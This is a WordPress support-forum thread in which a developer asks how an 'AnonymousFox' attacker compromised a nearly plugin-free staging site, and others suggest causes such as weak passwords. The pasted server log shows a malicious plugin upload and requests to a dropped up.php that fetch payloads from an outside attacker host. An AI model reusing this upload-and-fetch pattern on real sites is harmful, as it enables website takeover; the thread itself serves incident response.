AnonymousFox hack on staging website with almost no plugins. How?

  • Pacicio

    (@pacicio)


    3 years, 3 months ago

    Hi, today a website I’m working on got strangely hacked.

    The website is blocked to search engines. I’m using the _underscores theme as a base to create a custom theme.

    I have just these plugins installed:

    • Disable Comments
    • Meta Box
    • Yoast Duplicate Post
    • Yoast SEO

    Today my password changed and my username became “AnonymousFox”.
    Thanks to another administrator we deleted this account and created another one for me with a different password than before.

    I know that “AnonymousFox” is related to the old exploit of WordPress 5.5 and the plugin “WP File Manager” (https://www.brightvessel.com/anonymous-fox-wordpress-5-5-hack-should-i-be-concerned/).

    The point is that my WordPress version was up-to-date and I didin’t have “WP File Manager” installed.

    After some investigations we found a plugin called Three Column Screen Layout. It was disabled and after looking at the files we found out that there were some malicious code. We deleted it.

    Then we found this requests in the server log from a different IP address than ours:

    
200 - POST /wp-login.php HTTP/1.0
200 - GET  /wp-admin/ HTTP/1.0
200 - GET  /wp-admin/plugin-install.php?tab=upload HTTP/1.0
200 - POST /wp-admin/update.php?action=upload-plugin HTTP/1.0
200 - GET  /wp-content/plugins/aekwrpxkla/up.php HTTP/1.0
500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p2.txt HTTP/1.0
500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p2.txt HTTP/1.0
500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p2.txt HTTP/1.0
200 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p1.txt HTTP/1.0
500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p1.txt HTTP/1.0
200 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p1.txt HTTP/1.0

    So, my question is: how did they manage to upload this malicious plugin and changed my username and password?

    Looking at the log it seems that they just logged in, uploaded the hacked plugin and called one of the malicious files.

    We used WordFence and Quttera malware scanner without finding anything suspicious.

    What could have happened? My password was too weak? One of the installed plugin has an exploit?

    Thanks for the help and for reading this much.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Anonymous User 17160716

    (@anonymized-17160716)

    3 years, 3 months ago

    Pacicio, hi there.

    What could have happened?

    It may well be that your site has been hacked for a long time ago, and some malicious activity has just begun. This happens quite often, especially if no action was taken during a new big “wave” of hacks, or some malicious injections were not found and removed.

    We used WordFence and Quttera malware scanner without finding anything suspicious.

    Those solutions is really easy to bypass, so don’t be surprised.

    My password was too weak? One of the installed plugin has an exploit?

    Yes, as a possible case. Your password or another privileged user – doesn’t matter.

    Thread Starter Pacicio

    (@pacicio)

    3 years, 3 months ago

    It may well be that your site has been hacked for a long time ago

    This is unlikely. The website is a fresh installation made less than one month ago and we installed nothing but the plugins listed.

    This is what scares me most. A fresh installation with trusted plugins that got hacked. Past hacks always involved some bugged plugin or something else, but this time it feels so strange.

    I would like to understand where the possible exploit could be to prevent those things in the future.

    We enabled some server-side security improvements, but we usually do these on published websites because we don’t expect hack on development websites. Evidently we were wrong.

    Anonymous User 17160716

    (@anonymized-17160716)

    3 years, 3 months ago

    Pacicio,

    This is what scares me most.

    You know, bad things happen sometimes 🙂 If your website was created quite recently, then the access and error logs have probably also been preserved. You should double check them to get as much information as possible about the first suspicious requests to your website.

    we don’t expect hack on development websites

    On a dev websites, weak passwords are often used, and not only to the dashboard.

    atxmatt

    (@atxmatt)

    3 years, 3 months ago

    I’ve been following this post – @pacicio have you thought about scanning and potentially cleaning the computers and/or workstations that the site was built on or where you have worked?

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘AnonymousFox hack on staging website with almost no plugins. How?’ is closed to new replies.